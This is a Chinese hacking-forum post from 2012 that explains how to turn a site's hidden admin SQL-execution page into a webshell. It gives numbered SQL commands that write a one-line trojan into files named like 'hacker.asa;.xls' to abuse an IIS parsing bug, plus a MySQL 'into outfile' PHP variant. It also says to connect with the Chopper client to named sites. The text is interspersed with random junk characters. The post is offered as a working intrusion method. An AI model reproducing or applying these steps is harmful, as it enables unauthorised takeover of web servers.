好不容易进了后台,发现啥上传啊。备份啊多木有。7 L1 W& G5 H. E$ u8 d. @
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的5 Y9 l9 W/ M2 x m/ s
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
* }% ^) j: d: N- {! w9 @然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:4 y6 I! P8 p! f
1.create table cmd (a varchar(50))
9 Q) P4 p2 s7 g( W4 U2.insert into cmd (a) values (‘‘)6 t/ J* } P5 ^0 s
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd' E7 I8 }2 j# C: W7 U2 {% i' W- `5 t! g
(把表cmd的内容导出为物理路径的一个EXCEL文件)/ F9 q* x- q7 E* z: Z
4.drop table cmd
7 a; G J# p; @/ x8 H6 M利用IIS的BUG成功拿到了WEBSHELL。! L0 f0 c* \# k
0 i" T2 b4 A4 [5 Y直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
) D( s& O" }! Z: Y6 S4 P3 h0 A+ @: C! ]' q4 o
SQL语句意思解释:
/ l) y; k3 w% O 第一句$ |' f* Y8 B3 s- L/ r
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
9 r8 T' e/ ~7 B; L. n$ \. S4 }4 k$ F4 N% u! c" R% T# C: ~. y* V; N
第二句7 B U- |# B! ] J- O+ Y
在表cmd的a字段插入一句话木马
& o) G' Z6 L- D% T 第三句* w+ ~2 o4 h( V* i+ S. {% L% D
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
+ M( i/ A4 r3 v) M% H; O- E5 |
) D+ |) V1 |; n! m3 N 第四句
3 w! X/ R7 i7 w. j' g 删除建立的cmd表
0 z9 K5 s$ w7 Q, H& l6 q/ }* G" K, w/ ^- f% y3 c7 {
以下内容为测试:
0 |) e% ]6 [: {0 U" v7 U3 N+ t1 s$ W Access利用后台SQL执行命令功能导出WebShell:3 {" F$ y$ j, `( F4 Z4 R! S
这个更简单:
1 K) }0 p/ ?. {* E7 b [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]8 F2 d/ \5 ~1 j2 t1 D$ z, ]; J
或者5 f! B7 {( q/ y; k
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
* P; y1 L9 N/ P1 ]/ i; T
/ I- @" ~+ S' W, D6 L$ Q+ ?2 z 后台有执行SQL语句功能(vote为已知表段)
' M# W+ R8 a+ [1 B 希望对大家有所帮助拿shell的又一个思路' \* U" N) k5 V, s2 Q
|
发表于 2012-9-13 17:53:58
收藏
支持
反对